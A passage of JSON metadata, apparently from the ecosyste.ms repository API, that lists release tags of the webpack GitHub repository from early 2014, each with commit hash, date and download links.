v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/